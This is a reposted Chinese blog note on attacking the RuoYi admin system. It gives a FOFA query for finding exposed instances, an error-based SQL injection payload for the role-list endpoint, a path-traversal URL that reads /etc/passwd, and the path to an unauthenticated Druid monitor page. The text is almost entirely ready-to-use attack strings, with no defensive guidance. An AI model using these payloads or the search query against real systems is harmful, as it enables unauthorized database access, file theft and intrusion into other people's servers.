首页 > 数据库技术 > 详细

若依后台管理系统sql注入和未授权访问

时间:2021-09-02 08:08:52      阅读:385      评论:0      收藏:0      [点我收藏+]

做测试遇到的若依系统,记录下

FOFA:

app="若依-管理系统"

漏洞一:sql注入:

漏洞位置在"系统管理"里中的"角色管理中"
http://xxxxxxx/system/role/list

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

漏洞二:任意文件下载

影响版本:RuoYi < v4.5.1

若依管理系统后台任意文件读取

http://xxx/common/download/resource?resource/profile/…/…/…/…/etc/passwd

若依管理系统未授权访问

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

参考:https://blog.csdn.net/Guapichen/article/details/119212781

 

 

若依后台管理系统sql注入和未授权访问

原文:https://www.cnblogs.com/xyz315/p/15209340.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!